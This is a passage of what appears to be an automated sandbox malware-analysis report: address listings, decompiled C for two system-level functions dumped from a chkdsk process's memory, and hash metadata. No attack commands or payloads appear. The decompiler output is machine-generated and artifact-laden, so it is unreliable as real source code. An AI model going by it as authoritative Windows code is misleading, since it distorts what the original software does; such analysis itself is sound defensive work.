                                                      						L2:
                                                      						_t260 = _v572;
                                                      						goto L3;
                                                      					}
                                                      				}
                                                      				L101:
                                                      			}
                                                      0x04dee1b1
                                                      0x00000000
                                                      0x04da457b
                                                      0x04da457b
                                                      0x04da4582
                                                      0x04dee1ab
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04da4588
                                                      0x04da4588
                                                      0x04da458c
                                                      0x04dee1c4
                                                      0x04dee1c4
                                                      0x00000000
                                                      0x04da4592
                                                      0x04da4592
                                                      0x04da4599
                                                      0x04dee1be
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04da459f
                                                      0x04da459f
                                                      0x04da45a3
                                                      0x04dee1d7
                                                      0x04dee1e4
                                                      0x00000000
                                                      0x04da45a9
                                                      0x04da45a9
                                                      0x04da45b0
                                                      0x04dee1d1
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04da45b6
                                                      0x04da45b6
                                                      0x04da45b6
                                                      0x00000000
                                                      0x04da45b6
                                                      0x04da45b0
                                                      0x04da45a3
                                                      0x04da4599
                                                      0x04da458c
                                                      0x04da4582
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04da41f4
                                                      0x04da423e
                                                      0x04da4241
                                                      0x04da45c0
                                                      0x04da45c4
                                                      0x00000000
                                                      0x04da45ca
                                                      0x04da45ca
                                                      0x00000000
                                                      0x04dee207
                                                      0x04dee20f
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04da45d1
                                                      0x00000000
                                                      0x00000000
                                                      0x04da45ca
                                                      0x00000000
                                                      0x04da4247
                                                      0x04da4247
                                                      0x04da4247
                                                      0x04da4249
                                                      0x04da4249
                                                      0x04da4249
                                                      0x04da4251
                                                      0x04da4251
                                                      0x04da4257
                                                      0x04da425f
                                                      0x04da426e
                                                      0x04da4270
                                                      0x04da427a
                                                      0x04dee219
                                                      0x04dee219
                                                      0x04da4280
                                                      0x04da4282
                                                      0x04da4456
                                                      0x04da45ea
                                                      0x00000000
                                                      0x04da45f0
                                                      0x04dee223
                                                      0x00000000
                                                      0x04dee223
                                                      0x04da445c
                                                      0x04da445c
                                                      0x00000000
                                                      0x04da445c
                                                      0x00000000
                                                      0x04da4288
                                                      0x04da428c
                                                      0x04dee298
                                                      0x04da4292
                                                      0x04da4292
                                                      0x04da429e
                                                      0x04da42a3
                                                      0x04da42a7
                                                      0x04da42ac
                                                      0x04dee22d
                                                      0x04da42b2
                                                      0x04da42b2
                                                      0x04da42b9
                                                      0x04da42bc
                                                      0x04da42c2
                                                      0x04da42ca
                                                      0x04da42cd
                                                      0x04da42cd
                                                      0x04da42d4
                                                      0x04da433f
                                                      0x04da433f
                                                      0x04da42d6
                                                      0x04da42d6
                                                      0x04da42d9
                                                      0x04da42dd
                                                      0x04da42eb
                                                      0x04dee23a
                                                      0x04da42f1
                                                      0x04da4305
                                                      0x04da430d
                                                      0x04da4315
                                                      0x04da4318
                                                      0x04da431f
                                                      0x04da4322
                                                      0x04da432e
                                                      0x04da433b
                                                      0x04da433b
                                                      0x00000000
                                                      0x04da432e
                                                      0x04da42eb
                                                      0x04da434c
                                                      0x04da434e
                                                      0x04da4352
                                                      0x04da4359
                                                      0x04da435e
                                                      0x04da4361
                                                      0x04da436e
                                                      0x04da438a
                                                      0x04da438e
                                                      0x04da4396
                                                      0x04da439e
                                                      0x04da43a1
                                                      0x04da43ad
                                                      0x04da43bb
                                                      0x04da43bb
                                                      0x04da43ad
                                                      0x04da436e
                                                      0x04da43bf
                                                      0x04da43c5
                                                      0x04da4463
                                                      0x04da4463
                                                      0x04da43ce
                                                      0x04da43d5
                                                      0x04da43d9
                                                      0x04da43df
                                                      0x04da4475
                                                      0x04da4479
                                                      0x04da4491
                                                      0x04da4491
                                                      0x04da4479
                                                      0x04da43e5
                                                      0x04da43eb
                                                      0x04da43f4
                                                      0x04da43f6
                                                      0x04da43f9
                                                      0x04da43fc
                                                      0x04da43ff
                                                      0x04da44e8
                                                      0x04da44ed
                                                      0x04da44f3
                                                      0x04dee247
                                                      0x00000000
                                                      0x04da44f9
                                                      0x04da4504
                                                      0x04da4508
                                                      0x04da450f
                                                      0x04dee269
                                                      0x00000000
                                                      0x04da4515
                                                      0x04da4519
                                                      0x04da4531
                                                      0x04da4534
                                                      0x04da4537
                                                      0x04da453e
                                                      0x04da4541
                                                      0x04da454a
                                                      0x04dee255
                                                      0x04dee255
                                                      0x04dee25b
                                                      0x04dee25e
                                                      0x04dee261
                                                      0x04dee261
                                                      0x04da4555
                                                      0x04da4559
                                                      0x04da455d
                                                      0x04dee26d
                                                      0x04dee270
                                                      0x04dee274
                                                      0x04dee27a
                                                      0x04dee27d
                                                      0x04dee28e
                                                      0x04dee28e
                                                      0x04da4563
                                                      0x04da4563
                                                      0x04da4569
                                                      0x04da4569
                                                      0x00000000
                                                      0x04da455d
                                                      0x04da450f
                                                      0x00000000
                                                      0x04da44f3
                                                      0x04da43ff
                                                      0x04da4405
                                                      0x04da4405
                                                      0x04da4405
                                                      0x04da42ac
                                                      0x04da428c
                                                      0x04da4282
                                                      0x04da4407
                                                      0x04da440d
                                                      0x04dee2af
                                                      0x04dee2af
                                                      0x04da4413
                                                      0x04da4413
                                                      0x00000000
                                                      0x04da41d4
                                                      0x00000000
                                                      0x04da41c3
                                                      0x04da41bd
                                                      0x04da4415
                                                      0x04da4415
                                                      0x04da4416
                                                      0x04da4417
                                                      0x04da4429
                                                      0x04da416e
                                                      0x04da416e
                                                      0x04da4175
                                                      0x04da4498
                                                      0x04da449f
                                                      0x04dee12d
                                                      0x00000000
                                                      0x04dee133
                                                      0x00000000
                                                      0x04dee133
                                                      0x04da44a5
                                                      0x04da44a5
                                                      0x04da44aa
                                                      0x00000000
                                                      0x04da44bb
                                                      0x04da44ca
                                                      0x04da44d6
                                                      0x04da44d7
                                                      0x04da44d8
                                                      0x04da44e3
                                                      0x04da44e3
                                                      0x04da44aa
                                                      0x04da417b
                                                      0x04da417b
                                                      0x04da417b
                                                      0x00000000
                                                      0x04da417b
                                                      0x04da4175
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a466b61c1a7238f698c4952d776d341aaba4529ea474f8c9b1dda8b5e4f3ec7e
                                                      • Instruction ID: 5b396c4eaecdf6d46960a3aea775cd201766934901166b7899e1cc61e5cda87d
                                                      • Opcode Fuzzy Hash: a466b61c1a7238f698c4952d776d341aaba4529ea474f8c9b1dda8b5e4f3ec7e
                                                      • Instruction Fuzzy Hash: 86F18F706083118FD724DF19C484A3AB7E1FF88718F04892EF486CB290E7B5E8A1DB52
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E04DB20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed char _v24;
                                                      				intOrPtr _v28;
                                                      				signed int _v32;
                                                      				void* _v36;
                                                      				char _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				unsigned int _v60;
                                                      				char _v64;
                                                      				unsigned int _v68;
                                                      				signed int _v72;
                                                      				char _v73;
                                                      				signed int _v74;
                                                      				char _v75;
                                                      				signed int _v76;
                                                      				void* _v81;
                                                      				void* _v82;
                                                      				void* _v89;
                                                      				void* _v92;
                                                      				void* _v97;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed char _t128;
                                                      				void* _t129;
                                                      				signed int _t130;
                                                      				void* _t132;
                                                      				signed char _t133;
                                                      				intOrPtr _t135;
                                                      				signed int _t137;
                                                      				signed int _t140;
                                                      				signed int* _t144;
                                                      				signed int* _t145;
                                                      				intOrPtr _t146;
                                                      				signed int _t147;
                                                      				signed char* _t148;
                                                      				signed int _t149;
                                                      				signed int _t153;
                                                      				signed int _t169;
                                                      				signed int _t174;
                                                      				signed int _t180;
                                                      				void* _t197;
                                                      				void* _t198;
                                                      				signed int _t201;
                                                      				intOrPtr* _t202;
                                                      				intOrPtr* _t205;
                                                      				signed int _t210;
                                                      				signed int _t215;
                                                      				signed int _t218;
                                                      				signed char _t221;
                                                      				signed int _t226;
                                                      				char _t227;
                                                      				signed int _t228;
                                                      				void* _t229;
                                                      				unsigned int _t231;
                                                      				void* _t235;
                                                      				signed int _t240;
                                                      				signed int _t241;
                                                      				void* _t242;
                                                      				signed int _t246;
                                                      				signed int _t248;
                                                      				signed int _t252;
                                                      				signed int _t253;
                                                      				void* _t254;
                                                      				intOrPtr* _t256;
                                                      				intOrPtr _t257;
                                                      				unsigned int _t262;
                                                      				signed int _t265;
                                                      				void* _t267;
                                                      				signed int _t275;
                                                      
                                                      				_t198 = __ebx;
                                                      				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                                      				_v68 = __ecx;
                                                      				_v73 = 0;
                                                      				_t201 = __edx & 0x00002000;
                                                      				_t128 = __edx & 0xffffdfff;
                                                      				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                                      				_v72 = _t128;
                                                      				if((_t128 & 0x00000008) != 0) {
                                                      					__eflags = _t128 - 8;
                                                      					if(_t128 != 8) {
                                                      						L69:
                                                      						_t129 = 0xc000000d;
                                                      						goto L23;
                                                      					} else {
                                                      						_t130 = 0;
                                                      						_v72 = 0;
                                                      						_v75 = 1;
                                                      						L2:
                                                      						_v74 = 1;
                                                      						_t226 =  *0x4e78714; // 0x0
                                                      						if(_t226 != 0) {
                                                      							__eflags = _t201;
                                                      							if(_t201 != 0) {
                                                      								L62:
                                                      								_v74 = 1;
                                                      								L63:
                                                      								_t130 = _t226 & 0xffffdfff;
                                                      								_v72 = _t130;
                                                      								goto L3;
                                                      							}
                                                      							_v74 = _t201;
                                                      							__eflags = _t226 & 0x00002000;
                                                      							if((_t226 & 0x00002000) == 0) {
                                                      								goto L63;
                                                      							}
                                                      							goto L62;
                                                      						}
                                                      						L3:
                                                      						_t227 = _v75;
                                                      						L4:
                                                      						_t240 = 0;
                                                      						_v56 = 0;
                                                      						_t252 = _t130 & 0x00000100;
                                                      						if(_t252 != 0 || _t227 != 0) {
                                                      							_t240 = _v68;
                                                      							_t132 = E04DB2EB0(_t240);
                                                      							__eflags = _t132 - 2;
                                                      							if(_t132 != 2) {
                                                      								__eflags = _t132 - 1;
                                                      								if(_t132 == 1) {
                                                      									goto L25;
                                                      								}
                                                      								__eflags = _t132 - 6;
                                                      								if(_t132 == 6) {
                                                      									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                                      									if( *((short*)(_t240 + 4)) != 0x3f) {
                                                      										goto L40;
                                                      									}
                                                      									_t197 = E04DB2EB0(_t240 + 8);
                                                      									__eflags = _t197 - 2;
                                                      									if(_t197 == 2) {
                                                      										goto L25;
                                                      									}
                                                      								}
                                                      								L40:
                                                      								_t133 = 1;
                                                      								L26:
                                                      								_t228 = _v75;
                                                      								_v56 = _t240;
                                                      								__eflags = _t133;
                                                      								if(_t133 != 0) {
                                                      									__eflags = _t228;
                                                      									if(_t228 == 0) {
                                                      										L43:
                                                      										__eflags = _v72;
                                                      										if(_v72 == 0) {
                                                      											goto L8;
                                                      										}
                                                      										goto L69;
                                                      									}
                                                      									_t133 = E04D858EC(_t240);
                                                      									_t221 =  *0x4e75cac; // 0x16
                                                      									__eflags = _t221 & 0x00000040;
                                                      									if((_t221 & 0x00000040) != 0) {
                                                      										_t228 = 0;
                                                      										__eflags = _t252;
                                                      										if(_t252 != 0) {
                                                      											goto L43;
                                                      										}
                                                      										_t133 = _v72;
                                                      										goto L7;
                                                      									}
                                                      									goto L43;
                                                      								} else {
                                                      									_t133 = _v72;
                                                      									goto L6;
                                                      								}
                                                      							}
                                                      							L25:
                                                      							_t133 = _v73;
                                                      							goto L26;
                                                      						} else {
                                                      							L6:
                                                      							_t221 =  *0x4e75cac; // 0x16
                                                      							L7:
                                                      							if(_t133 != 0) {
                                                      								__eflags = _t133 & 0x00001000;
                                                      								if((_t133 & 0x00001000) != 0) {
                                                      									_t133 = _t133 | 0x00000a00;
                                                      									__eflags = _t221 & 0x00000004;
                                                      									if((_t221 & 0x00000004) != 0) {
                                                      										_t133 = _t133 | 0x00000400;
                                                      									}
                                                      								}
                                                      								__eflags = _t228;
                                                      								if(_t228 != 0) {
                                                      									_t133 = _t133 | 0x00000100;
                                                      								}
                                                      								_t229 = E04DC4A2C(0x4e76e40, 0x4dc4b30, _t133, _t240);
                                                      								__eflags = _t229;
                                                      								if(_t229 == 0) {
                                                      									_t202 = _a20;
                                                      									goto L100;
                                                      								} else {
                                                      									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                                      									L15:
                                                      									_t202 = _a20;
                                                      									 *_t202 = _t135;
                                                      									if(_t229 == 0) {
                                                      										L100:
                                                      										 *_a4 = 0;
                                                      										_t137 = _a8;
                                                      										__eflags = _t137;
                                                      										if(_t137 != 0) {
                                                      											 *_t137 = 0;
                                                      										}
                                                      										 *_t202 = 0;
                                                      										_t129 = 0xc0000017;
                                                      										goto L23;
                                                      									} else {
                                                      										_t242 = _a16;
                                                      										if(_t242 != 0) {
                                                      											_t254 = _t229;
                                                      											memcpy(_t242, _t254, 0xd << 2);
                                                      											_t267 = _t267 + 0xc;
                                                      											_t242 = _t254 + 0x1a;
                                                      										}
                                                      										_t205 = _a4;
                                                      										_t25 = _t229 + 0x48; // 0x48
                                                      										 *_t205 = _t25;
                                                      										_t140 = _a8;
                                                      										if(_t140 != 0) {
                                                      											__eflags =  *((char*)(_t267 + 0xa));
                                                      											if( *((char*)(_t267 + 0xa)) != 0) {
                                                      												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                                      											} else {
                                                      												 *_t140 = 0;
                                                      											}
                                                      										}
                                                      										_t256 = _a12;
                                                      										if(_t256 != 0) {
                                                      											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                                      										}
                                                      										_t257 =  *_t205;
                                                      										_v48 = 0;
                                                      										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                                      										_v56 = 0;
                                                      										_v52 = 0;
                                                      										_t144 =  *( *[fs:0x30] + 0x50);
                                                      										if(_t144 != 0) {
                                                      											__eflags =  *_t144;
                                                      											if( *_t144 == 0) {
                                                      												goto L20;
                                                      											}
                                                      											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                      											goto L21;
                                                      										} else {
                                                      											L20:
                                                      											_t145 = 0x7ffe0384;
                                                      											L21:
                                                      											if( *_t145 != 0) {
                                                      												_t146 =  *[fs:0x30];
                                                      												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                                      												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                                      													_t147 = E04DA7D50();
                                                      													__eflags = _t147;
                                                      													if(_t147 == 0) {
                                                      														_t148 = 0x7ffe0385;
                                                      													} else {
                                                      														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                      													}
                                                      													__eflags =  *_t148 & 0x00000020;
                                                      													if(( *_t148 & 0x00000020) != 0) {
                                                      														_t149 = _v72;
                                                      														__eflags = _t149;
                                                      														if(__eflags == 0) {
                                                      															_t149 = 0x4d65c80;
                                                      														}
                                                      														_push(_t149);
                                                      														_push( &_v48);
                                                      														 *((char*)(_t267 + 0xb)) = E04DBF6E0(_t198, _t242, _t257, __eflags);
                                                      														_push(_t257);
                                                      														_push( &_v64);
                                                      														_t153 = E04DBF6E0(_t198, _t242, _t257, __eflags);
                                                      														__eflags =  *((char*)(_t267 + 0xb));
                                                      														if( *((char*)(_t267 + 0xb)) != 0) {
                                                      															__eflags = _t153;
                                                      															if(_t153 != 0) {
                                                      																__eflags = 0;
                                                      																E04E07016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                                      																L04DA2400(_t267 + 0x20);
                                                      															}
                                                      															L04DA2400( &_v64);
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      											_t129 = 0;
                                                      											L23:
                                                      											return _t129;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      							L8:
                                                      							_t275 = _t240;
                                                      							if(_t275 != 0) {
                                                      								_v73 = 0;
                                                      								_t253 = 0;
                                                      								__eflags = 0;
                                                      								L29:
                                                      								_push(0);
                                                      								_t241 = E04DB2397(_t240);
                                                      								__eflags = _t241;
                                                      								if(_t241 == 0) {
                                                      									_t229 = 0;
                                                      									L14:
                                                      									_t135 = 0;
                                                      									goto L15;
                                                      								}
                                                      								__eflags =  *((char*)(_t267 + 0xb));
                                                      								 *(_t241 + 0x34) = 1;
                                                      								if( *((char*)(_t267 + 0xb)) != 0) {
                                                      									E04DA2280(_t134, 0x4e78608);
                                                      									__eflags =  *0x4e76e48 - _t253; // 0x3083f8
                                                      									if(__eflags != 0) {
                                                      										L48:
                                                      										_t253 = 0;
                                                      										__eflags = 0;
                                                      										L49:
                                                      										E04D9FFB0(_t198, _t241, 0x4e78608);
                                                      										__eflags = _t253;
                                                      										if(_t253 != 0) {
                                                      											L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                                      										}
                                                      										goto L31;
                                                      									}
                                                      									 *0x4e76e48 = _t241;
                                                      									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                                      									__eflags = _t253;
                                                      									if(_t253 != 0) {
                                                      										_t57 = _t253 + 0x34;
                                                      										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                                                      										__eflags =  *_t57;
                                                      										if( *_t57 == 0) {
                                                      											goto L49;
                                                      										}
                                                      									}
                                                      									goto L48;
                                                      								}
                                                      								L31:
                                                      								_t229 = _t241;
                                                      								goto L14;
                                                      							}
                                                      							_v73 = 1;
                                                      							_v64 = _t240;
                                                      							asm("lock bts dword [esi], 0x0");
                                                      							if(_t275 < 0) {
                                                      								_t231 =  *0x4e78608; // 0x0
                                                      								while(1) {
                                                      									_v60 = _t231;
                                                      									__eflags = _t231 & 0x00000001;
                                                      									if((_t231 & 0x00000001) != 0) {
                                                      										goto L76;
                                                      									}
                                                      									_t73 = _t231 + 1; // 0x1
                                                      									_t210 = _t73;
                                                      									asm("lock cmpxchg [edi], ecx");
                                                      									__eflags = _t231 - _t231;
                                                      									if(_t231 != _t231) {
                                                      										L92:
                                                      										_t133 = E04DB6B90(_t210,  &_v64);
                                                      										_t262 =  *0x4e78608; // 0x0
                                                      										L93:
                                                      										_t231 = _t262;
                                                      										continue;
                                                      									}
                                                      									_t240 = _v56;
                                                      									goto L10;
                                                      									L76:
                                                      									_t169 = E04DBE180(_t133);
                                                      									__eflags = _t169;
                                                      									if(_t169 != 0) {
                                                      										_push(0xc000004b);
                                                      										_push(0xffffffff);
                                                      										E04DC97C0();
                                                      										_t231 = _v68;
                                                      									}
                                                      									_v72 = 0;
                                                      									_v24 =  *( *[fs:0x18] + 0x24);
                                                      									_v16 = 3;
                                                      									_v28 = 0;
                                                      									__eflags = _t231 & 0x00000002;
                                                      									if((_t231 & 0x00000002) == 0) {
                                                      										_v32 =  &_v36;
                                                      										_t174 = _t231 >> 4;
                                                      										__eflags = 1 - _t174;
                                                      										_v20 = _t174;
                                                      										asm("sbb ecx, ecx");
                                                      										_t210 = 3 |  &_v36;
                                                      										__eflags = _t174;
                                                      										if(_t174 == 0) {
                                                      											_v20 = 0xfffffffe;
                                                      										}
                                                      									} else {
                                                      										_v32 = 0;
                                                      										_v20 = 0xffffffff;
                                                      										_v36 = _t231 & 0xfffffff0;
                                                      										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                                      										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                                      									}
                                                      									asm("lock cmpxchg [edi], esi");
                                                      									_t262 = _t231;
                                                      									__eflags = _t262 - _t231;
                                                      									if(_t262 != _t231) {
                                                      										goto L92;
                                                      									} else {
                                                      										__eflags = _v72;
                                                      										if(_v72 != 0) {
                                                      											E04DC006A(0x4e78608, _t210);
                                                      										}
                                                      										__eflags =  *0x7ffe036a - 1;
                                                      										if(__eflags <= 0) {
                                                      											L89:
                                                      											_t133 =  &_v16;
                                                      											asm("lock btr dword [eax], 0x1");
                                                      											if(__eflags >= 0) {
                                                      												goto L93;
                                                      											} else {
                                                      												goto L90;
                                                      											}
                                                      											do {
                                                      												L90:
                                                      												_push(0);
                                                      												_push(0x4e78608);
                                                      												E04DCB180();
                                                      												_t133 = _v24;
                                                      												__eflags = _t133 & 0x00000004;
                                                      											} while ((_t133 & 0x00000004) == 0);
                                                      											goto L93;
                                                      										} else {
                                                      											_t218 =  *0x4e76904; // 0x400
                                                      											__eflags = _t218;
                                                      											if(__eflags == 0) {
                                                      												goto L89;
                                                      											} else {
                                                      												goto L87;
                                                      											}
                                                      											while(1) {
                                                      												L87:
                                                      												__eflags = _v16 & 0x00000002;
                                                      												if(__eflags == 0) {
                                                      													goto L89;
                                                      												}
                                                      												asm("pause");
                                                      												_t218 = _t218 - 1;
                                                      												__eflags = _t218;
                                                      												if(__eflags != 0) {
                                                      													continue;
                                                      												}
                                                      												goto L89;
                                                      											}
                                                      											goto L89;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      							L10:
                                                      							_t229 =  *0x4e76e48; // 0x3083f8
                                                      							_v72 = _t229;
                                                      							if(_t229 == 0) {
                                                      								L45:
                                                      								E04D9FFB0(_t198, _t240, 0x4e78608);
                                                      								_t253 = _v76;
                                                      								goto L29;
                                                      							}
                                                      							if( *((char*)(_t229 + 0x40)) != 0) {
                                                      								L13:
                                                      								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                                      								asm("lock cmpxchg [esi], ecx");
                                                      								_t215 = 1;
                                                      								if(1 != 1) {
                                                      									while(1) {
                                                      										_t246 = _t215 & 0x00000006;
                                                      										_t180 = _t215;
                                                      										__eflags = _t246 - 2;
                                                      										_v56 = _t246;
                                                      										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                                      										asm("lock cmpxchg [edi], esi");
                                                      										_t248 = _v56;
                                                      										__eflags = _t180 - _t215;
                                                      										if(_t180 == _t215) {
                                                      											break;
                                                      										}
                                                      										_t215 = _t180;
                                                      									}
                                                      									__eflags = _t248 - 2;
                                                      									if(_t248 == 2) {
                                                      										__eflags = 0;
                                                      										E04DC00C2(0x4e78608, 0, _t235);
                                                      									}
                                                      									_t229 = _v72;
                                                      								}
                                                      								goto L14;
                                                      							}
                                                      							_t18 = _t229 + 0x38; // 0x8
                                                      							if( *_t18 !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                      								goto L45;
                                                      							}
                                                      							goto L13;
                                                      						}
                                                      					}
                                                      				}
                                                      				_t227 = 0;
                                                      				_v75 = 0;
                                                      				if(_t128 != 0) {
                                                      					goto L4;
                                                      				}
                                                      				goto L2;
                                                      			}












































































                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7569d856c9521e6377d4ec93aabddd91f097ce3d3f834cdbf7cf625fd789df05
                                                      • Instruction ID: 8e5375ea37725f322119dbb4cfa601682e05b476615ac5bb2560190f18308468
                                                      • Opcode Fuzzy Hash: 7569d856c9521e6377d4ec93aabddd91f097ce3d3f834cdbf7cf625fd789df05
                                                      • Instruction Fuzzy Hash: D7F1F332608301EFDB25CF68D8587AA77E1BB85364F05899DE9D68B381D734F841CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 92%
                                                      			E04D9849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                                      				void* _t136;
                                                      				signed int _t139;
                                                      				signed int _t141;
                                                      				signed int _t145;
                                                      				intOrPtr _t146;
                                                      				signed int _t149;
                                                      				signed int _t150;
                                                      				signed int _t161;
                                                      				signed int _t163;
                                                      				signed int _t165;
                                                      				signed int _t169;
                                                      				signed int _t171;
                                                      				signed int _t194;
                                                      				signed int _t200;
                                                      				void* _t201;
                                                      				signed int _t204;
                                                      				signed int _t206;
                                                      				signed int _t210;
                                                      				signed int _t214;
                                                      				signed int _t215;
                                                      				signed int _t218;
                                                      				void* _t221;
                                                      				signed int _t224;
                                                      				signed int _t226;
                                                      				intOrPtr _t228;
                                                      				signed int _t232;
                                                      				signed int _t233;
                                                      				signed int _t234;
                                                      				void* _t237;
                                                      				void* _t238;
                                                      
                                                      				_t236 = __esi;
                                                      				_t235 = __edi;
                                                      				_t193 = __ebx;
                                                      				_push(0x70);
                                                      				_push(0x4e5f9c0);
                                                      				E04DDD0E8(__ebx, __edi, __esi);
                                                      				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                                                      				if( *0x4e77b04 == 0) {
                                                      					L4:
                                                      					goto L5;
                                                      				} else {
                                                      					_t136 = E04D9CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                                                      					_t236 = 0;
                                                      					if(_t136 < 0) {
                                                      						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                                                      					}
                                                      					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                                                      						_t193 =  *( *[fs:0x30] + 0x18);
                                                      						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                                                      						 *(_t237 - 0x68) = _t236;
                                                      						 *(_t237 - 0x6c) = _t236;
                                                      						_t235 = _t236;
                                                      						 *(_t237 - 0x60) = _t236;
                                                      						E04DA2280( *[fs:0x30], 0x4e78550);
                                                      						_t139 =  *0x4e77b04; // 0x1
                                                      						__eflags = _t139 - 1;
                                                      						if(__eflags != 0) {
                                                      							_t200 = 0xc;
                                                      							_t201 = _t237 - 0x40;
                                                      							_t141 = E04DBF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                                                      							 *(_t237 - 0x44) = _t141;
                                                      							__eflags = _t141;
                                                      							if(_t141 < 0) {
                                                      								L50:
                                                      								E04D9FFB0(_t193, _t235, 0x4e78550);
                                                      								L5:
                                                      								return E04DDD130(_t193, _t235, _t236);
                                                      							}
                                                      							_push(_t201);
                                                      							_t221 = 0x10;
                                                      							_t202 =  *(_t237 - 0x40);
                                                      							_t145 = E04D81C45( *(_t237 - 0x40), _t221);
                                                      							 *(_t237 - 0x44) = _t145;
                                                      							__eflags = _t145;
                                                      							if(_t145 < 0) {
                                                      								goto L50;
                                                      							}
                                                      							_t146 =  *0x4e77b9c; // 0x0
                                                      							_t235 = L04DA4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                                                      							 *(_t237 - 0x60) = _t235;
                                                      							__eflags = _t235;
                                                      							if(_t235 == 0) {
                                                      								_t149 = 0xc0000017;
                                                      								 *(_t237 - 0x44) = 0xc0000017;
                                                      							} else {
                                                      								_t149 =  *(_t237 - 0x44);
                                                      							}
                                                      							__eflags = _t149;
                                                      							if(__eflags >= 0) {
                                                      								L8:
                                                      								 *(_t237 - 0x64) = _t235;
                                                      								_t150 =  *0x4e77b10; // 0x8
                                                      								 *(_t237 - 0x4c) = _t150;
                                                      								_push(_t237 - 0x74);
                                                      								_push(_t237 - 0x39);
                                                      								_push(_t237 - 0x58);
                                                      								_t193 = E04DBA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                                                      								 *(_t237 - 0x44) = _t193;
                                                      								__eflags = _t193;
                                                      								if(_t193 < 0) {
                                                      									L30:
                                                      									E04D9FFB0(_t193, _t235, 0x4e78550);
                                                      									__eflags = _t235 - _t237 - 0x38;
                                                      									if(_t235 != _t237 - 0x38) {
                                                      										_t235 =  *(_t237 - 0x48);
                                                      										L04DA77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                                                      									} else {
                                                      										_t235 =  *(_t237 - 0x48);
                                                      									}
                                                      									__eflags =  *(_t237 - 0x6c);
                                                      									if( *(_t237 - 0x6c) != 0) {
                                                      										L04DA77F0(_t235, _t236,  *(_t237 - 0x6c));
                                                      									}
                                                      									__eflags = _t193;
                                                      									if(_t193 >= 0) {
                                                      										goto L4;
                                                      									} else {
                                                      										goto L5;
                                                      									}
                                                      								}
                                                      								_t204 =  *0x4e77b04; // 0x1
                                                      								 *(_t235 + 8) = _t204;
                                                      								__eflags =  *((char*)(_t237 - 0x39));
                                                      								if( *((char*)(_t237 - 0x39)) != 0) {
                                                      									 *(_t235 + 4) = 1;
                                                      									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                                                      									_t161 =  *0x4e77b10; // 0x8
